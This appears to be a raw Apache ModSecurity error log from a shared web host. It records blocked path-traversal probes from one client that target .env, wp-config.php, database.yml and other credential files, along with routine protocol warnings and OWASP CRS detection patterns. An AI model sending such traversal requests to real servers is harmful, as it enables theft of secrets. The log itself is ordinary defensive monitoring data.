[Tue May 12 05:31:28.159324 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfDxs7kySIUZ3ORnImQQAAAQY"]
[Tue May 12 05:31:28.197355 2026] [core:error] [pid 1842385:tid 1842396] [client 45.148.10.247:51022] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 05:31:30.074862 2026] [core:error] [pid 1842385:tid 1842409] [client 45.148.10.247:17058] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 05:31:31.051404 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfExfeipD4uoG21FoxmQAAABY"]
[Tue May 12 05:31:31.051504 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfExfeipD4uoG21FoxmQAAABY"]
[Tue May 12 05:31:31.051674 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.local"] [unique_id "agKfExfeipD4uoG21FoxmQAAABY"]
[Tue May 12 05:31:31.834098 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfExfeipD4uoG21FoxmQAAABY"]
[Tue May 12 05:31:31.872028 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfExfeipD4uoG21FoxmgAAABY"]
[Tue May 12 05:31:31.872098 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfExfeipD4uoG21FoxmgAAABY"]
[Tue May 12 05:31:31.872263 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKfExfeipD4uoG21FoxmgAAABY"]
[Tue May 12 05:31:32.665009 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfExfeipD4uoG21FoxmgAAABY"]
[Tue May 12 05:31:32.703186 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfFBfeipD4uoG21FoxmwAAABY"]
[Tue May 12 05:31:32.703261 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfFBfeipD4uoG21FoxmwAAABY"]
[Tue May 12 05:31:32.703432 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKfFBfeipD4uoG21FoxmwAAABY"]
[Tue May 12 05:31:33.488435 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfFBfeipD4uoG21FoxmwAAABY"]
[Tue May 12 05:31:33.526117 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfFRfeipD4uoG21FoxnQAAABY"]
[Tue May 12 05:31:33.526326 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKfFRfeipD4uoG21FoxnQAAABY"]
[Tue May 12 05:31:34.315163 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfFRfeipD4uoG21FoxnQAAABY"]
[Tue May 12 05:31:34.353034 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfFhfeipD4uoG21FoxngAAABY"]
[Tue May 12 05:31:34.353236 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/settings.py"] [unique_id "agKfFhfeipD4uoG21FoxngAAABY"]
[Tue May 12 05:31:35.147302 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfFhfeipD4uoG21FoxngAAABY"]
[Tue May 12 05:31:35.186851 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfFxfeipD4uoG21FoxnwAAABY"]
[Tue May 12 05:31:35.187156 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/config/database.yml"] [unique_id "agKfFxfeipD4uoG21FoxnwAAABY"]
[Tue May 12 05:31:36.008381 2026] [security2:error] [pid 1808852:tid 1808877] [client 45.148.10.247:17060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKfFxfeipD4uoG21FoxnwAAABY"]
[Tue May 12 05:31:44.236377 2026] [security2:error] [pid 1825179:tid 1825200] [client 43.130.14.245:51696] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKfINr1yOh9TvizezigagAAAEI"]
[Tue May 12 05:31:48.504467 2026] [security2:error] [pid 1808852:tid 1808875] [client 43.162.109.249:40182] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKfJBfeipD4uoG21FoxqwAAABQ"]
[Tue May 12 05:31:48.661681 2026] [security2:error] [pid 1825287:tid 1825311] [client 43.130.14.245:55748] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/"] [unique_id "agKfJAgpmE1yW0glLdgu8QAAAMY"], referer: https://rentparadise.fr/?post_type=mphb_room_type&p=387
[Tue May 12 05:31:53.188853 2026] [security2:error] [pid 1842385:tid 1842403] [client 43.162.109.249:57136] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKfKRs7kySIUZ3ORnImUgAAAQ0"], referer: http://www.maelbailly.fr
[Tue May 12 05:31:59.939906 2026] [security2:error] [pid 1844863:tid 1844879] [client 43.135.135.57:52300] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "k06.fr"] [uri "/"] [unique_id "agKfL_aAnTZtx1_H_wy3xgAAAUo"]
[Tue May 12 05:32:06.821752 2026] [security2:error] [pid 1842385:tid 1842390] [client 43.153.48.240:34230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agKfNhs7kySIUZ3ORnImVQAAAQA"]
[Tue May 12 05:32:09.404192 2026] [security2:error] [pid 1825287:tid 1825313] [client 43.153.48.240:36758] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKfOQgpmE1yW0glLdgu9gAAAMg"], referer: http://www.rixonephotography.com
[Tue May 12 05:32:11.588372 2026] [autoindex:error] [pid 1844863:tid 1844875] [client 65.49.1.77:51437] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:32:11.886603 2026] [security2:error] [pid 1825179:tid 1825218] [client 3.214.176.44:59388] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freecamtocamsex.com"] [unique_id "agKfO9r1yOh9TvizezigcgAAAFQ"]
[Tue May 12 05:32:11.886948 2026] [security2:error] [pid 1825179:tid 1825218] [client 3.214.176.44:59388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freecamtocamsex.com"] [unique_id "agKfO9r1yOh9TvizezigcgAAAFQ"]
[Tue May 12 05:32:11.887171 2026] [security2:error] [pid 1825179:tid 1825218] [client 3.214.176.44:59388] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/freecamtocamsex.com"] [unique_id "agKfO9r1yOh9TvizezigcgAAAFQ"]
[Tue May 12 05:32:26.446558 2026] [security2:error] [pid 1825287:tid 1825317] [client 43.165.170.119:37898] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/informatique/realisations/sillytavern/"] [unique_id "agKfSggpmE1yW0glLdgvBQAAAMw"]
